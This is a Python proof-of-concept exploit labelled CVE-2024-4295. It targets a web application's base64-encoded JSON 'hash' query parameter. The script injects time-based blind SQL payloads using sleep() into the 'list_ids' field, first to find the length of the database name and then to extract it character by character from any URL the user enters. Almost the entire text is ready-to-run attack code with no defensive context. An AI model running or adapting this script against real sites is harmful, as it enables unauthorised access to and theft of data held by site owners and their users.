CVE-2024-4295

from urllib.parse import urlparse
import requests as req
import base64
import json
import string
import time
import re

def parse_hash(url):
    hash = urlparse(url).query.split("&")[1].replace("hash=","")
    hash = json.loads(base64.b64decode(hash))
    return hash

def len_info(url):
    d = 0
    hash = parse_hash(url)
    while 1:
        payload = "2) and (select 1 from (select sleep(  if(length(database())={0},5,0)  ))x)#".format(str(d))
        hash['list_ids']=[payload]
        base64_hash = base64.b64encode(json.dumps(hash).encode()).decode()
        url = re.sub("hash=(.*)",'hash='+base64_hash,url)
        s = time.time()
        resp = req.get(url)
        e = time.time()
        if e-s>=5:
           print("Length database: "+str(d))
           return d
        d+=1

def extract(url):
    info = ''
    hash = parse_hash(url)
    for j in range(0,len_info(url)):
        for i in string.ascii_lowercase+string.digits+string.punctuation:
            payload = "2) and (select 1 from (select sleep(  if(database() like '{0}%',5,0)  ))x)#".format(info+i)
            hash['list_ids']=[payload]
            base64_hash = base64.b64encode(json.dumps(hash).encode()).decode()
            url = re.sub("hash=(.*)",'hash='+base64_hash,url)
            s = time.time()
            resp = req.get(url)
            e = time.time()
            if e-s>=5:
               info+=i
               print("Database: "+info)
               break

url = input("url: ")
info_hash = parse_hash(url)
print("="*20)
print('Information hash: ')
for key,val in info_hash.items():
    print(key+": "+str(val))
print("="*20)
extract(url)